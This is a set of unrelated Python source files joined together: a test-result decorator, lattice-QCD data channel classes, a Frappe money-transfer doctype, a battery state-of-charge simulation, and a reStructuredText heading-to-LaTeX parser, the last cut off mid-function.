def addUnexpectedSuccess(self, test, details=None):
outcome = getattr(self.decorated, 'addUnexpectedSuccess', None)
if outcome is None:
try:
test.fail("")
except test.failureException:
return self.addFailure(test, sys.exc_info())
if details is not None:
try:
return outcome(test, details=details)
except TypeError:
pass
return outcome(test)
def addSuccess(self, test, details=None):
if details is not None:
try:
return self.decorated.addSuccess(test, details=details)
except TypeError:
pass
return self.decorated.addSuccess(test)
def _check_args(self, err, details):
param_count = 0
if err is not None:
param_count += 1
if details is not None:
param_count += 1
if param_count != 1:
raise ValueError("Must pass only one of err '%s' and details '%s"
% (err, details))
def _details_to_exc_info(self, details):
"""Convert a details dict to an exc_info tuple."""
return (
_StringException,
_StringException(_details_to_str(details, special='traceback')),
None)
def done(self):
try:
return self.decorated.done()
except AttributeError:
return
def progress(self, offset, whence):
method = getattr(self.decorated, 'progress', None)
if method is None:
return
return method(offset, whence)
@property
def shouldStop(self):
return self.decorated.shouldStop
def startTest(self, test):
return self.decorated.startTest(test)
def startTestRun(self):
try:
return self.decorated.startTestRun()
except AttributeError:
return
def stop(self):
return self.decorated.stop()
def stopTest(self, test):
return self.decorated.stopTest(test)
def stopTestRun(self):
try:
return self.decorated.stopTestRun()
except AttributeError:
return
def tags(self, new_tags, gone_tags):
method = getattr(self.decorated, 'tags', None)
if method is None:
return
return method(new_tags, gone_tags)
def time(self, a_datetime):
method = getattr(self.decorated, 'time', None)
if method is None:
return
return method(a_datetime)
def wasSuccessful(self):
return self.decorated.wasSuccessful()
class _StringException(Exception):
"""An exception made from an arbitrary string."""
if not str_is_unicode:
def __init__(self, string):
if type(string) is not unicode:
raise TypeError("_StringException expects unicode, got %r" %
(string,))
Exception.__init__(self, string)
def __str__(self):
return self.args[0].encode("utf-8")
def __unicode__(self):
return self.args[0]
# For 3.0 and above the default __str__ is fine, so we don't define one.
def __hash__(self):
return id(self)
def __eq__(self, other):
try:
return self.args == other.args
except AttributeError:
return False
def _format_text_attachment(name, text):
if '\n' in text:
return "%s: {{{\n%s\n}}}\n" % (name, text)
return "%s: {{{%s}}}" % (name, text)
def _details_to_str(details, special=None):
"""Convert a details dict to a string.
:param details: A dictionary mapping short names to ``Content`` objects.
:param special: If specified, an attachment that should have special
attention drawn to it. The primary attachment. Normally it's the
traceback that caused the test to fail.
:return: A formatted string that can be included in text test results.
"""
empty_attachments = []
binary_attachments = []
text_attachments = []
special_content = None
# sorted is for testing, may want to remove that and use a dict
# subclass with defined order for items instead.
for key, content in sorted(details.items()):
if content.content_type.type != 'text':
binary_attachments.append((key, content.content_type))
continue
text = _u('').join(content.iter_text()).strip()
if not text:
empty_attachments.append(key)
continue
# We want the 'special' attachment to be at the bottom.
if key == special:
special_content = '%s\n' % (text,)
continue
text_attachments.append(_format_text_attachment(key, text))
if text_attachments and not text_attachments[-1].endswith('\n'):
text_attachments.append('')
if special_content:
text_attachments.append(special_content)
lines = []
if binary_attachments:
lines.append('Binary content:\n')
for name, content_type in binary_attachments:
lines.append(' %s (%s)\n' % (name, content_type))
if empty_attachments:
lines.append('Empty attachments:\n')
for name in empty_attachments:
lines.append(' %s\n' % (name,))
if (binary_attachments or empty_attachments) and text_attachments:
lines.append('\n')
lines.append('\n'.join(text_attachments))
return _u('').join(lines)
|
import abc
import subprocess
import logging
from observables import BLOperator, MCObservable
from data import BLDataChannel, GIDataChannel
import util
class Channel(metaclass=abc.ABCMeta):
ISOSPIN_MAP = {
'singlet': "0",
'doublet': "1h",
'triplet': "1",
'quartet': "3h",
'quintet': "2",
'sextet': "5h"
}
def __init__(self, *, particle_type=None, isospin, strangeness=None, laph_query="laph_query",
sigmond_query="sigmond_query"):
self.particle_type = particle_type
self.strangeness = strangeness
self.isospin = isospin
self.laph_query = laph_query
self.sigmond_query = sigmond_query
# @ADH - I think I am going to have the DataHandler deal with these in the future
self.raw_data_channels = list()
@staticmethod
def initialize(*, data_file, laph_query="laph_query", sigmond_query="sigmond_query",
is_basic_laph=True):
if is_basic_laph:
query_result = subprocess.check_output([laph_query, '-i', data_file]).decode()
laph_xml = util.queryToXML(query_result)
operator = BLOperator.createFromXML(laph_xml.find(".//Operator"))
if 'special' in data_file.split('/'):
return SpecialChannel(particle_type=operator.particle_type, isospin=operator.isospin,
strangeness=operator.strangeness, flavor=operator.flavor,
laph_query=laph_query, sigmond_query=sigmond_query)
elif operator.psq > 0:
return MovingChannel(particle_type=operator.particle_type, isospin=operator.isospin,
strangeness=operator.strangeness, psq=operator.psq,
lg_irrep=operator.lg_irrep, laph_query=laph_query,
sigmond_query=sigmond_query)
else:
return AtRestChannel(particle_type=operator.particle_type, isospin=operator.isospin,
strangeness=operator.strangeness, lg_irrep=operator.lg_irrep,
laph_query=laph_query, sigmond_query=sigmond_query)
else:
query_result = subprocess.check_output([sigmond_query, '-k', data_file]).decode()
try:
records = query_result.split('Record')
observable = MCObservable.createFromXML(util.queryToXML(records[1]))
if observable.psq > 0:
return MovingChannel(isospin=observable.isospin, psq=observable.psq,
lg_irrep=observable.lg_irrep, laph_query=laph_query,
sigmond_query=sigmond_query)
else:
return AtRestChannel(isospin=observable.isospin, lg_irrep=observable.lg_irrep,
laph_query=laph_query, sigmond_query=sigmond_query)
except IndexError:
logging.warning("%s contains no records", data_file)
except AttributeError:
logging.warning("%s contains Observables", data_file)
return None
def addRawDataChannel(self, path, is_basic_laph=True):
if is_basic_laph:
self.raw_data_channels.append(BLDataChannel(path, self.laph_query))
else:
self.raw_data_channels.append(GIDataChannel(path, self.sigmond_query))
@property
@abc.abstractmethod
def channel_string(self):
pass
@property
def is_special(self):
return isinstance(self, SpecialChannel)
@property
def is_atrest(self):
return isinstance(self, AtRestChannel)
@property
def is_moving(self):
return isinstance(self, MovingChannel)
def __hash__(self):
return hash(self.__repr__())
def __str__(self):
return self.channel_string
# @ADH - Should be checking that 'other' is an instance of an object
# derived from Channel. I'm not sure how to best do that right now.
# So, this will suffice for the moment.
def __eq__(self, other):
return self.__repr__() == other.__repr__()
def __ne__(self, other):
return self.__repr__() != other.__repr__()
def __lt__(self, other):
return self.__repr__() < other.__repr__()
def __gt__(self, other):
return self.__repr__() > other.__repr__()
def __le__(self, other):
return self.__repr__() <= other.__repr__()
def __ge__(self, other):
return self.__repr__() >= other.__repr__()
class SpecialChannel(Channel):
def __init__(self, *, particle_type, isospin, strangeness, flavor, laph_query="laph_query",
sigmond_query="sigmond_query"):
super().__init__(particle_type=particle_type, isospin=isospin, strangeness=strangeness,
laph_query=laph_query, sigmond_query=sigmond_query)
self.flavor = flavor
@property
def channel_string(self):
if self.particle_type == "boson":
particle_type = "B"
elif self.particle_type == "fermion":
particle_type = "F"
strangeness = str(self.strangeness).replace('-', 'm')
return "{p_type}_{flavor}_I{isospin}_S{strangeness}_special".format(
p_type=particle_type, flavor=self.flavor, isospin=self.ISOSPIN_MAP[self.isospin],
strangeness=strangeness)
def __repr__(self):
return "SP_{}".format(self.channel_string)
class AtRestChannel(Channel):
def __init__(self, *, particle_type=None, isospin, strangeness=None, lg_irrep,
laph_query="laph_query", sigmond_query="sigmond_query"):
super().__init__(particle_type=particle_type, isospin=isospin, strangeness=strangeness,
laph_query=laph_query, sigmond_query=sigmond_query)
self.psq = 0
self.lg_irrep = lg_irrep
@property
def channel_string(self):
if self.particle_type == "boson":
particle_type = "B_"
elif self.particle_type == "fermion":
particle_type = "F_"
else:
particle_type = ""
if self.strangeness is not None:
strangeness = "S{}_".format(self.strangeness).replace('-', 'm')
else:
strangeness = ""
return "{p_type}I{isospin}_{strangeness}P0_{irrep}".format(
p_type=particle_type, isospin=self.ISOSPIN_MAP[self.isospin], strangeness=strangeness,
irrep=self.lg_irrep)
def __repr__(self):
return "AR_{}".format(self.channel_string)
class MovingChannel(Channel):
def __init__(self, *, particle_type=None, isospin, strangeness=None, psq, lg_irrep,
laph_query="laph_query", sigmond_query="sigmond_query"):
super().__init__(particle_type=particle_type, isospin=isospin, strangeness=strangeness,
laph_query=laph_query, sigmond_query=sigmond_query)
self.psq = psq
self.lg_irrep = lg_irrep
@property
def channel_string(self):
if self.particle_type == "boson":
particle_type = "B_"
elif self.particle_type == "fermion":
particle_type = "F_"
else:
particle_type = ""
if self.strangeness is not None:
strangeness = "S{}_".format(self.strangeness).replace('-', 'm')
else:
strangeness = ""
return "{p_type}I{isospin}_{strangeness}PSQ{psq}_{irrep}".format(
p_type=particle_type, isospin=self.ISOSPIN_MAP[self.isospin], strangeness=strangeness,
psq=self.psq, irrep=self.lg_irrep)
def __repr__(self):
return "MV_{}".format(self.channel_string)
|
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
from frappe.utils.data import flt, nowdate, getdate, cint
class MoneyTransfere(Document):
def on_submit(self):
self.validate_transfere()
def validate(self):
self.get_dummy_accounts()
def get_dummy_accounts(self):
dummy_to = frappe.db.get_values("Account", {"name": "حساب استلام من"+" - "+self.from_company + " - "+self.abbr_to,
"company": self.to_company,
"parent_account":"حساب استلام من"+" - "+self.abbr_to })
self.dummy_to=dummy_to[0][0]
dummy_from = frappe.db.get_values("Account", {"name": "حساب ارسال الي"+" - "+self.to_company + " - "+self.abbr,
"company": self.from_company,
"parent_account":"حساب ارسال"+" - "+self.abbr })
self.dummy_from=dummy_from[0][0]
def before_cancel(self):
pe = frappe.get_value("Payment Entry", filters = {"transfere_reference": self.name}, fieldname = "name")
if pe:
pe_doc = frappe.get_doc("Payment Entry", pe)
pe_doc.cancel()
je = frappe.get_value("Journal Entry Account", filters = {"reference_name": self.name}, fieldname = "parent")
if je:
je_doc = frappe.get_doc("Journal Entry", je)
je_doc.cancel()
def validate_transfere(self):
if self.from_company != self.to_company:
# sending_account = "حساب ارسال الى " + self.to_company
# receiving_account = "حساب استلام من " + self.from_company
# self.add_account_for_company(sending_account, self.to_company, "Liability")
# self.add_account_for_company(receiving_account, self.from_company, "Expense")
self.add_payment_entry(self.from_account, self.dummy_from, self.from_company)
self.add_journal_entry(self.to_account,self.dummy_to, self.to_company)
else:
self.add_payment_entry(self.from_account, self.to_account, self.from_company)
def add_account_for_company(self, account, company, r_type):
pass
# pacc_name = ""
# if r_type == "Expense":
# pacc_name = "حساب ارسال - E"
# elif r_type == "Liability":
# pacc_name = "حساب استقبال - o"
# # if not frappe.db.exists("Account", pacc_name):
# # pacc = frappe.new_doc("Account")
# # pacc.account_name = pacc_name
# # pacc.root_type = r_type
# # pacc.is_group = 1
# # pacc.parent_account = ""
# # pacc.company = company
# # pacc.flags.ignore_validate = True
# # pacc.insert()
# if not frappe.db.exists("Account", account):
# acc = frappe.new_doc("Account")
# acc.account_name = account
# acc.company = company
# acc.parent_account = pacc_name
# acc.is_group = 0
# acc.insert()
def add_payment_entry(self, paid_from, paid_to, company):
pe = frappe.new_doc("Payment Entry")
pe.payment_type = "Internal Transfer"
pe.company = company
pe.paid_from = paid_from
pe.paid_to = paid_to
pe.paid_amount = self.transfered_amount
pe.received_amount = self.transfered_amount
pe.posting_date = nowdate()
pe.mode_of_payment = self.mode_of_payment
pe.transfere_reference = self.name
pe.insert()
pe.submit()
# pe.setup_party_account_field()
# pe.set_missing_values()
# pe.set_exchange_rate()
# pe.set_amounts()
# self.assertEquals(pe.difference_amount, 500)
# pe.append("deductions", {
# "account": "_Test Exchange Gain/Loss - _TC",
# "cost_center": "_Test Cost Center - _TC",
# "amount": 500
# })
def add_journal_entry(self, account1, account2, company):
default_cost = frappe.get_value("Company", filters = {"name":company}, fieldname = "cost_center")
jv = frappe.new_doc("Journal Entry")
jv.posting_date = nowdate()
jv.company = company
jv.voucher_type = "Opening Entry"
jv.set("accounts", [
{
"account": account2,
"credit_in_account_currency": self.transfered_amount,
"cost_center": default_cost,
"reference_type": "Money Transfere",
"reference_name": self.name
}, {
"account": account1,
"debit_in_account_currency": self.transfered_amount,
"cost_center": default_cost,
"reference_type": "Money Transfere",
"reference_name": self.name
}
])
jv.insert()
jv.submit()
|
import numpy as np
def min_max_model(power, use, battery_capacity):
"""
Minimal maximum battery model, obsoleted
:param power: Pandas TimeSeries, total power from renewable system
:param use: float, unit W fixed load of the power system
:param battery_capacity: float, unit Wh battery capacity
:return: list, energy history in battery
"""
power = power.tolist()
energy = 0
energy_history = []
for p in power:
energy = min(battery_capacity, max(0, energy + (p - use) * 1))
energy_history.append(energy)
return energy_history
def soc_model_fixed_load(
power,
use,
battery_capacity,
depth_of_discharge=1,
discharge_rate=0.005,
battery_eff=0.9,
discharge_eff=0.8,
):
"""
Battery state of charge model with fixed load. (Obsolete)
:param power: Pandas TimeSeries of total power from renewable system
:param use: float unit W fixed load of the power system
:param battery_capacity: float unit Wh battery capacity
:param depth_of_discharge: float 0 to 1 maximum allowed discharge depth
:param discharge_rate: self discharge rate
:param battery_eff: optional 0 to 1 battery energy store efficiency default 0.9
:param discharge_eff: battery discharge efficiency 0 to 1 default 0.8
:return: tuple SOC: state of charge, energy history: E in battery,
unmet_history: unmet energy history, waste_history: waste energy history
"""
DOD = depth_of_discharge
power = power.tolist()
use_history = []
waste_history = []
unmet_history = []
energy_history = []
energy = 0
for p in power:
if p >= use:
use_history.append(use)
unmet_history.append(0)
energy_new = energy * (1 - discharge_rate) + (p - use) * battery_eff
if energy_new < battery_capacity:
energy = energy_new # battery energy got update
waste_history.append(0)
else:
waste_history.append(p - use)
energy = energy
elif p < use:
energy_new = energy * (1 - discharge_rate) + (p - use) / discharge_eff
if energy_new > (1 - DOD) * battery_capacity:
energy = energy_new
unmet_history.append(0)
waste_history.append(0)
use_history.append(use)
elif energy * (1 - discharge_rate) + p * battery_eff < battery_capacity:
energy = energy * (1 - discharge_rate) + p * battery_eff
unmet_history.append(use - p)
use_history.append(0)
waste_history.append(0)
else:
unmet_history.append(use - p)
use_history.append(0)
waste_history.append(p)
energy = energy
energy_history.append(energy)
if battery_capacity == 0:
SOC = np.array(energy_history)
else:
SOC = np.array(energy_history) / battery_capacity
return SOC, energy_history, unmet_history, waste_history, use_history
class Battery:
"""
A simple finite state based energy flow battery model.
"""
def __init__(self, capacity, config={}):
"""
Initialise the battery with a given capacity and configuration.
:param capacity: float, unit Wh
:param config: options including DOD, depth of discharge; sigma, self-discharge rate; eta_in, charge efficiency;
eta_out, discharge efficiency; init_charge, percentage of the battery pre-charge; where all values shall between 0
and 1
"""
self.capacity = capacity
self.config = config
self.set_parameters()
def set_parameters(self):
"""
Setup the parameters using the config file, options including DOD, depth of discharge; sigma, self-discharge rate;
eta_in, charge efficiency; eta_out, discharge efficiency; init_charge, percentage of the battery pre-charge;
where all values shall between 0 and 1.
"""
try:
self.depth_of_discharge = self.config['simulation']['battery']['DOD']
self.discharge_rate = self.config['simulation']['battery']['sigma']
self.battery_eff = self.config['simulation']['battery']['eta_in']
self.discharge_eff = self.config['simulation']['battery']['eta_out']
self.init_charge = self.config['simulation']['battery']['B0']
except KeyError:
print('Parameter is not found in config file, default values are used.')
self.depth_of_discharge = 1
self.discharge_rate = 0.005
self.battery_eff = 0.9
self.discharge_eff = 0.8
self.init_charge = 1
def run(self, power, use):
"""
Run the battery model with a list of power generation and usage.
:param power: list, power generation unit in W
:param use: list, power usage unit in W
:return: None
"""
DOD = self.depth_of_discharge
battery_capacity = self.capacity
discharge_rate = self.discharge_rate
discharge_eff = self.discharge_eff
battery_eff = self.battery_eff
use_history = []
waste_history = []
unmet_history = []
energy_history = []
SOC = []
energy = self.init_charge * self.capacity
for p, u in zip(power, use):
if p >= u:
use_history.append(u)
unmet_history.append(0)
energy_new = energy * (1 - discharge_rate) + (p - u) * battery_eff
if energy_new < battery_capacity:
energy = energy_new # battery energy got update
waste_history.append(0)
else:
waste_history.append(p - u)
energy = energy
elif p < u:
energy_new = energy * (1 - discharge_rate) + (p - u) / discharge_eff
if energy_new > (1 - DOD) * battery_capacity:
energy = energy_new
unmet_history.append(0)
waste_history.append(0)
use_history.append(u)
elif energy * (1 - discharge_rate) + p * battery_eff < battery_capacity:
energy = energy * (1 - discharge_rate) + p * battery_eff
unmet_history.append(u - p)
use_history.append(0)
waste_history.append(0)
else:
unmet_history.append(u - p)
use_history.append(0)
waste_history.append(p)
energy = energy
energy_history.append(energy)
SOC.append(energy / battery_capacity)
self.SOC = SOC
self.energy_history = energy_history
self.unmet_history = unmet_history
self.waste_history = waste_history
self.use_history = use_history
def battery_history(self):
"""
Return the history of the battery.
:return: np array, the SOC, energy in the battery, unmet power supply, wasted power and the supplied power unit in W
"""
history = np.vstack(
(
np.array(self.SOC),
np.array(self.energy_history),
np.array(self.unmet_history),
np.array(self.waste_history),
np.array(self.use_history),
)
)
return history
def lost_power_supply_probability(self):
"""
Return the lost power supply probability (LPSP) using the battery history.
:return: float, LPSP
"""
LPSP = 1 - self.unmet_history.count(0) / len(self.energy_history)
return LPSP
class Battery_managed:
"""
Battery managed is a the basic class for the demand load controllable battery model.
"""
def __init__(self, capacity, config={}):
"""
:param capacity: float, unit Wh
:param config: options including DOD, depth of discharge; sigma, self-discharge rate; eta_in, charge efficiency;
eta_out, discharge efficiency; init_charge, percentage of the battery pre-charge; where all values shall between 0
and 1
"""
self.capacity = capacity
self.config = config
self.set_parameters()
self.init_history()
self.init_simulation()
self.status = []
self.states_list = []
def set_parameters(self):
"""
Setup the parameters using the config file, options including DOD, depth of discharge; sigma, self-discharge rate;
eta_in, charge efficiency; eta_out, discharge efficiency; init_charge, percentage of the battery pre-charge;
where all values shall between 0 and 1.
"""
try:
self.depth_of_discharge = self.config['simulation']['battery']['DOD']
self.discharge_rate = self.config['simulation']['battery']['sigma']
self.battery_eff = self.config['simulation']['battery']['eta_in']
self.discharge_eff = self.config['simulation']['battery']['eta_out']
self.init_charge = self.config['simulation']['battery']['B0']
self.DOD = self.depth_of_discharge
except KeyError:
print('Parameter is not found in config file, default values are used.')
self.depth_of_discharge = 1
self.discharge_rate = 0.005
self.battery_eff = 0.9
self.discharge_eff = 0.8
self.init_charge = 1
self.DOD = self.depth_of_discharge
def reset(self):
"""
Reset the battery state to the start of simulation.
:return:
"""
self.init_history()
self.init_simulation()
def init_simulation(self):
self.energy = self.init_charge * self.capacity
def init_history(self):
self.supply_history = []
self.waste_history = []
self.unmet_history = []
self.battery_energy_history = []
self.SOC = []
def step(self, plan, generated, gym = False):
"""
Run the finite state battery model on one time step.
:param plan: float, planned power usage in W
:param generated: float, power generation unit in W
:param gym: optional, set True to using in OpenAI gym mode
:return: float, the supplied power in W
"""
if gym == True:
plan = plan[0][0]
if generated >= plan:
self.supply_history.append(plan)
self.unmet_history.append(0)
energy_new = self.energy * (1 - self.discharge_rate) + (generated - plan) * self.battery_eff
if energy_new < self.capacity:
self.energy = energy_new # battery energy got update
self.waste_history.append(0)
self.status.append("""Demand can be meet by generation, also battery is not full.
Supply {demand}, charge {diff}.""".format(demand=plan, diff=generated - plan)
)
self.state = 'charge'
else:
self.waste_history.append(generated - plan - (self.capacity - self.energy))
self.energy = self.capacity
self.status.append("""Demand can be meet by generation, but battery is already full.
Supply {demand}, charge battery to full waste {diff}.""".format(
demand=plan, diff=generated - plan)
)
self.state = 'float'
elif generated < plan:
energy_new = self.energy * (1 - self.discharge_rate) + (generated - plan) / self.discharge_eff
if energy_new > (1 - self.DOD) * self.capacity:
self.energy = energy_new
self.unmet_history.append(0)
self.waste_history.append(0)
self.supply_history.append(plan)
self.status.append("""Demand can not meet by generation, power in battery can make up difference.
Supply {demand} by discharge from battery""".format(demand=plan))
self.state = 'discharge'
elif self.energy * (1 - self.discharge_rate) + generated * self.battery_eff < self.capacity:
self.energy = self.energy * (1 - self.discharge_rate) + generated * self.battery_eff
self.unmet_history.append(plan - generated)
self.supply_history.append(0)
self.waste_history.append(0)
self.status.append("""Demand can not meet by generation, also power in battery can not make up difference.
Charge {diff} to battery to avoid waste""".format(diff=generated))
self.state = 'unmet'
else:
self.unmet_history.append(plan - generated)
self.supply_history.append(0)
self.waste_history.append(generated - (self.capacity - self.energy))
self.energy = self.capacity
self.status.append("""Demand can not meet by generation, also power in battery can not make up difference.
Charge {diff} to make battery full""".format(
diff=self.capacity-self.energy))
self.state = 'unmet'
self.states_list.append(self.state)
self.battery_energy_history.append(self.energy)
self.SOC.append(self.energy / self.capacity)
self.supply = self.supply_history[-1]
return self.supply
def history(self):
"""
Get the history of the managed battery.
:return: np array including the history of the battery: SOC, battery energy, unmet and wasted energy, supplied power
"""
battery_history = np.vstack(
(
np.array(self.SOC),
np.array(self.battery_energy_history),
np.array(self.unmet_history),
np.array(self.waste_history),
np.array(self.supply_history),
)
)
return battery_history
def observation(self):
"""
Observation
:return:
"""
battery_state = {
'current_energy': self.energy,
'usable_capacity': self.DOD * self.capacity,
}
return battery_state
def story_board(self):
"""
For the use of explainable AI in power management system.
:return: the status of battery
"""
return self.status
def lost_power_supply_probability(self):
"""
Get the lost power supply probability of the managed battery after run.
:return: float, LPSP
"""
LPSP = 1 - self.unmet_history.count(0) / len(self.SOC)
return LPSP
def copy(self):
"""
Make a copy of battery model.
:return: Copied version of battery with same capacity and configuration
"""
return Battery_managed(self.capacity, self.config)
class Soc_model_variable_load:
"""
Obsolete basic class.
"""
def __init__(self, battery, power, load):
self.battery = battery
self.battery.run(power, load)
def get_lost_power_supply_probability(self):
return self.battery.lost_power_supply_probability()
def get_battery_history(self):
return self.battery.battery_history()
def get_quality_performance_index(self):
pass
def soc_model_variable_load(
power,
use,
battery_capacity,
depth_of_discharge=1,
discharge_rate=0.005,
battery_eff=0.9,
discharge_eff=0.8,
):
"""
Battery state of charge model with fixed load.
:param power: Pandas TimeSeries of total power from renewable system
:param use: float unit W fixed load of the power system
:param battery_capacity: float unit Wh battery capacity
:param depth_of_discharge: float 0 to 1 maximum allowed discharge depth
:param discharge_rate: self discharge rate
:param battery_eff: optional 0 to 1 battery energy store efficiency default 0.9
:param discharge_eff: battery discharge efficiency 0 to 1 default 0.8
:return: tuple SOC: state of charge, energy history: E in battery,
unmet_history: unmet energy history, waste_history: waste energy history
"""
DOD = depth_of_discharge
power = power.tolist()
use = use.tolist()
use_history = []
waste_history = []
unmet_history = []
energy_history = []
energy = 0
for p, u in zip(power, use):
if p >= u:
use_history.append(u)
unmet_history.append(0)
energy_new = energy * (1 - discharge_rate) + (p - u) * battery_eff
if energy_new < battery_capacity:
energy = energy_new # battery energy got update
waste_history.append(0)
else:
waste_history.append(p - u)
energy = energy
elif p < u:
energy_new = energy * (1 - discharge_rate) + (p - u) / discharge_eff
if energy_new > (1 - DOD) * battery_capacity:
energy = energy_new
unmet_history.append(0)
waste_history.append(0)
use_history.append(use)
elif energy * (1 - discharge_rate) + p * battery_eff < battery_capacity:
energy = energy * (1 - discharge_rate) + p * battery_eff
unmet_history.append(u - p)
use_history.append(0)
waste_history.append(0)
else:
unmet_history.append(u - p)
use_history.append(0)
waste_history.append(p)
energy = energy
energy_history.append(energy)
if battery_capacity == 0:
SOC = np.array(energy_history)
else:
SOC = np.array(energy_history) / battery_capacity
return SOC, energy_history, unmet_history, waste_history, use_history
if __name__ == '__main__':
b1 = Battery(10)
b1.run([1, 1, 1], [1, 1, 1])
b1.run([1, 1, 1], [10, 10, 10])
print(b1.lost_power_supply_probability())
|
import re
class HeadingsParser():
"""
The HeadingParser parses the document for headings.
NOT YET: converts headings to raw latex headings in the correct way, so that they can be referrenced to later
see https://www.sharelatex.com/learn/Sections_and_chapters for info about the levels"""
def __init__(self):
super().__init__()
self.title = None
self.subtitle = None
self.heading = []
# regexes
self.title_start_marker_regex = re.compile(r'[=]{3,}')
self.title_end_marker_regex = re.compile(r'[=]{3,}')
self.title_content_regex = re.compile(
r'''
^ # beginning of line
[ ] # one whitespace
[A-Za-z0-9äöüÄÖÜ]+ # alphanumerical string, no whitespace
(?P<title>[A-Za-z0-9äöüÄÖÜ ]+) # alphanumerical string, whitespace ok
[A-Za-z0-9äöüÄÖÜ]+ # alphanumerical string, no whitespace
[ ] # one whitespace
$ # end of line
''', re.VERBOSE|re.UNICODE
)
self.subtitle_start_marker_regex = re.compile(r'[-]{3,}')
self.subtitle_end_marker_regex = re.compile(r'[-]{3,}')
self.subtitle_content_regex = re.compile(
r'''
^ # beginning of line
[ ] # one whitespace
[A-Za-z0-9äöüÄÖÜ]+ # alphanumerical string, no whitespace
(?P<subtitle>[A-Za-z0-9äöüÄÖÜ ]+) # alphanumerical string, whitespace ok
[A-Za-z0-9äöüÄÖÜ]+ # alphanumerical string, no whitespace
[ ] # one whitespace
$ # end of line
''', re.VERBOSE|re.UNICODE
)
# Headings cannot begin with whitespace
self.h_content_regex = re.compile(
r'''
^ # beginning of line
[A-Za-z0-9äöüÄÖÜß(] # alphanum
[A-Za-z0-9äöüÄÖÜß,() -]* # alphanum or space
[A-Za-z0-9äöüÄÖÜß)] # alphanum
$ # end of line
''', re.VERBOSE|re.UNICODE
)
# chapter
self.h1_underlining_regex = re.compile(r'[=]{3,}')
# section
self.h2_underlining_regex = re.compile(r'[-]{3,}')
# subsection
self.h3_underlining_regex = re.compile(r'[~]{3,}')
# subsubsection
self.h4_underlining_regex = re.compile(r'[\^]{3,}')
# paragraph
self.h5_underlining_regex = re.compile(r'[*]{3,}')
# subparagraph
self.h6_underlining_regex = re.compile(r'[.]{3,}')
def parse(self, rst_file_content):
self.title = self.find_title(rst_file_content)
self.subtitle_content_regex = self.find_subtitle(rst_file_content)
return self.find_heading_labels(rst_file_content)
def find_title(self, rst_file_content):
print('looking for title ...')
title = None
for lineno, line in enumerate(rst_file_content):
previous_line = ""
if lineno > 0:
previous_line = rst_file_content[lineno - 1]
next_line = ""
if lineno < len(rst_file_content) - 1:
next_line = rst_file_content[lineno + 1]
# title
if (
self.title_start_marker_regex.match(previous_line) and
self.title_end_marker_regex.match(next_line) and
(
len(self.title_start_marker_regex.match(previous_line).group()) ==
len(self.title_end_marker_regex.match(next_line).group())
) and
self.title_content_regex.match(line) and
not title
):
title = self.title_content_regex.match(line).group('title')
print('title is:|', title, '|', sep='')
break
if not title: print('Could not find title in document.')
return title
def find_subtitle(self, rst_file_content):
print('looking for subtitle ...')
subtitle = None
for lineno, line in enumerate(rst_file_content):
previous_line = ""
if lineno > 0:
previous_line = rst_file_content[lineno - 1]
next_line = ""
if lineno < len(rst_file_content) - 1:
next_line = rst_file_content[lineno + 1]
if (
self.subtitle_start_marker_regex.match(previous_line) and
self.subtitle_end_marker_regex.match(next_line) and
(
len(self.subtitle_start_marker_regex.match(previous_line).group()) ==
len(self.subtitle_end_marker_regex.match(next_line).group())
) and
self.subtitle_content_regex.match(line) and
not subtitle
):
subtitle = self.subtitle_content_regex.match(line).group('subtitle')
print('subtitle is:|', subtitle, '|', sep='')
break
if not subtitle: print('Could not find subtitle in document.')
return subtitle
def find_heading_labels(self, rst_file_content):
print('looking for headings ...')
headings_dict = {}
# heading_labels = []
for lineno, line in enumerate(rst_file_content):
# print('current line:', lineno)
# print('current line:', line)
# if line.startswith("Schlussfolgerungen"):
# print('current line:', line)
previous_line = ""
if lineno > 0:
previous_line = rst_file_content[lineno - 1]
next_line = ""
if lineno < len(rst_file_content) - 1:
next_line = rst_file_content[lineno + 1]
# headings level 1
# print('looking for h1 ...')
if (
(previous_line.isspace() or previous_line == '') and
self.h_content_regex.match(line) and
self.h1_underlining_regex.match(next_line) and
len(self.h_content_regex.match(line).group()) == len(self.h1_underlining_regex.match(next_line).group())
):
print('found a h1:', line)
print('replacing chapter heading')
headings_dict[line] = self.heading_to_label(line, 'chapter')
# heading_labels.append(self.heading_to_label(line, 'chapter'))
rst_file_content[lineno] = ':raw-latex:`\chapter{' + line + '}`'
rst_file_content[lineno + 1] = ':raw-latex:`\label{' + self.heading_to_label(line, 'chapter') + '}`'
# headings level 2
# print('looking for h2 ...')
if (
(previous_line.isspace() or previous_line == '') and
self.h_content_regex.match(line) and
self.h2_underlining_regex.match(next_line) and
len(self.h_content_regex.match(line).group()) == len(self.h2_underlining_regex.match(next_line).group())
):
print('found a h2:', line)
headings_dict[line] = self.heading_to_label(line, 'section')
# heading_labels.append(self.heading_to_label(line, 'section'))
rst_file_content[lineno] = ':raw-latex:`\section{' + line + '}`'
rst_file_content[lineno + 1] = ':raw-latex:`\label{' + self.heading_to_label(line, 'section') + '}`'
# headings level 3
# print('looking for h3 ...')
if (
(previous_line.isspace() or previous_line == '') and
self.h_content_regex.match(line) and
self.h3_underlining_regex.match(next_line) and
len(self.h_content_regex.match(line).group()) == len(self.h3_underlining_regex.match(next_line).group())
):
print('found a h3:', line)
# heading_labels.append(self.heading_to_label(line, 'subsection'))
headings_dict[line] = self.heading_to_label(line, 'subsection')
rst_file_content[lineno] = ':raw-latex:`\subsection{' + line + '}`'
rst_file_content[lineno + 1] = ':raw-latex:`\label{' + self.heading_to_label(line, 'subsection') + '}`'
# headings level 4
# print('looking for h4 ...')
if (
(previous_line.isspace() or previous_line == '') and
self.h_content_regex.match(line) and
self.h4_underlining_regex.match(next_line) and
len(self.h_content_regex.match(line).group()) == len(self.h4_underlining_regex.match(next_line).group())
):
print('found a h4:', line)
# heading_labels.append(self.heading_to_label(line, 'subsubsection'))
headings_dict[line] = self.heading_to_label(line, 'subsubsection')
rst_file_content[lineno] = ':raw-latex:`\subsubsection{' + line + '}`'
rst_file_content[lineno + 1] = ':raw-latex:`\label{' + self.heading_to_label(line, 'subsubsection') + '}`'
# headings level 5
# print('looking for h5 ...')
if (
(previous_line.isspace() or previous_line == '') and
self.h_content_regex.match(line) and
self.h5_underlining_regex.match(next_line) and
len(self.h_content_regex.match(line).group()) == len(self.h5_underlining_regex.match(next_line).group())
):
print('found a h5:', line)
# heading_labels.append(self.heading_to_label(line, 'paragraph'))
headings_dict[line] = self.heading_to_label(line, 'paragraph')
rst_file_content[lineno] = ':raw-latex:`\paragraph{' + line + '}`'
